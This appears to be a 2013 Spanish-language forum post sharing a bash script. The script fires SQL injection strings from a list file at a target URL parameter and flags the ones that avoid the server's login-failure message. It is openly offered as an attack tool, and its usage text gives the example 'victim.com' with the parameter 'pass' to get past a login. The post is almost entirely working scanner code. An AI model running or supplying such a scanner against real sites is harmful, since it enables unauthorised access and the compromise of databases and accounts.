Escanner de sql injections en: 27 Junio 2013, 20:01 pm
Muy buenas! aver que les parece este programilla que prueba sql injection strings escritas en el archivo LIST (una por linea) y comprueba si la respuesta del servidor contiene <bad_boy_mssg>(4º parametro del programa), que es una palabra sacada del html de un intento fallido de loggin del servidor etc... si la respuesta del servidor no coniene <bad_boy_mssg> al probar una cadena de una linea de LIST esa linea puede estart modificando la sentencia sql entera y se saca por pantalla.

  1. function start_scan () {
  2. while read line
  3. do
  4. injection=$(echo -n "$line" | \perl -pe's/([^-_.~A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg');
  5. url=$(echo "$1/$2?$3=$injection");
  7. out=$(GET $url);
  8. found=1;
  9. for j in $out
  10. do
  11. if [ $j = $4 ]
  12. then
  13. found=0;
  14. fi
  15. done
  17. if [ $found = 1 ]
  18. then
  19. echo "[ STRING FOUND: $line ]";
  20. fi
  22. done <LIST
  23. echo "DONE";
  24. }
  27. if [ $# -lt 4 ]
  28. then
  29. echo "Usage:"; echo "";
  30. echo "LIST file must exist and contain de strings to inject";
  31. echo "";
  32. echo "RUNNING the scanner:------------------------------------------------------";
  33. echo "| bash scanner.bash <target> <injection_file> <parameter> <bad_boy_mssg> |";
  34. echo "--------------------------------------------------------------------------";
  35. echo "";
  36. echo "Example: bash scanner.bash victim.com index.php pass failed";
  37. echo "";
  38. echo "and the program will try victim.com/index.php?pass=...";
  39. echo "where ... are lines from LIST";
  40. else
  41. start_scan $1 $2 $3 $4;
  42. fi
  44. exit 0
